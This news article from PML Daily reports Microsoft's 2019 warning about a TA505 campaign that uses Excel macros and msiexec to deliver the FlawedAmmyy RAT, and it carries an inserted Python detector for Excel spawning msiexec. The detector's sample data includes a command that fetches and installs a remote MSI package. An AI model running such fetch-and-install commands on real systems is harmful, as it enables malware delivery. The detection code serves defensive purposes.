PML Daily

Microsoft warns users of new malware attack via a disguised Excel attachment

by JAVIRA SSEBWAMI | PML Daily Staff Writer
June 25, 2019
Microsoft has warned users of malware disguised as an Excel attachment. (PHOTO/File)

Microsoft is drawing attention to a new malware attack that infects Windows systems by abusing the macro functions of Microsoft's own Office software.

The campaign employs a complex infection chain to download the notorious FlawedAmmyy remote access trojan (RAT) and run it directly in memory.

The attack starts with an email and .xls attachment with content in the Korean language, indicating that it is primarily targeting Korean users.

It uses malicious macro functions in an Excel attachment to attack Windows PCs.

According to security firm Proofpoint, the malicious campaign has been started by a group called TA505.

The group has been responsible for similar attacks in the past, the security firm says. Its latest trick involves a malicious email with an Excel attachment, which Microsoft warns users against opening.

“When opened, the .xls file automatically runs a macro function that runs msiexec.exe, which in turn downloads an MSI archive. The MSI archive contains a digitally signed executable that is extracted and run[s], and that decrypts and runs another executable in memory,” Microsoft notes in its series of tweets.

A file called wsus.exe is then downloaded and decrypted. It is designed to pass itself off as the official Microsoft Windows Service Update Service (WSUS).

The file was digitally signed on June 19. It decrypts the payload in RAM, delivering FlawedAmmyy.
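
The first stage Microsoft describes, an Excel macro launching msiexec.exe to fetch an MSI archive, can be hunted for in process-creation logs. The sketch below is an added example, not code from Microsoft, Proofpoint or this article; the field names follow Sysmon Event ID 1, and the sample events, the address in them and the severity labels are constructed assumptions.

```python
import re
from ntpath import basename  # parses Windows paths on any platform

# Constructed process-creation events; field names follow Sysmon Event ID 1.
# 198.51.100.7 is a documentation-only address, not an indicator.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Program Files\Microsoft Office\Office16\EXCEL.EXE",
     "Image": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": "msiexec.exe /i http://198.51.100.7/pkg.msi"},
    {"ParentImage": r"C:\Windows\System32\services.exe",
     "Image": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": r"C:\Windows\System32\msiexec.exe /V"},
    {"ParentImage": r"C:\Program Files\Microsoft Office\Office16\EXCEL.EXE",
     "Image": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": r'msiexec /i "C:\Users\a\Downloads\tool.msi"'},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Program Files\Microsoft Office\Office16\EXCEL.EXE",
     "CommandLine": r'EXCEL.EXE "C:\Users\a\report.xls"'},
]

REMOTE_SOURCE = re.compile(r"https?://", re.IGNORECASE)

def classify(event):
    """Return a severity label if Excel spawned msiexec.exe, else None."""
    parent = basename(event.get("ParentImage", "")).lower()
    child = basename(event.get("Image", "")).lower()
    if parent != "excel.exe" or child != "msiexec.exe":
        return None
    # A remote package source matches the download step in the chain.
    if REMOTE_SOURCE.search(event.get("CommandLine", "")):
        return "high"
    # Excel starting the installer at all is unusual enough to review.
    return "medium"

def scan(events):
    """Return (index, severity) for every event that matches the pattern."""
    return [(i, sev) for i, e in enumerate(events) if (sev := classify(e))]

if __name__ == "__main__":
    for idx, sev in scan(SAMPLE_EVENTS):
        print(sev, SAMPLE_EVENTS[idx]["CommandLine"])
```
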

Microsoft says that its Threat Protection defends customers from this attack. “Cloud-based machine learning protections in Microsoft Defender ATP blocked all of the components of this attack at first sight, including the FlawedAmmyy RAT payload. Office 365 ATP detects the email campaign,” the company notes.

About

The PML Daily, published via www.pmldaily.com is a publication of Post Media Ltd, a professional Digital/New Media company in Uganda.


© 2022
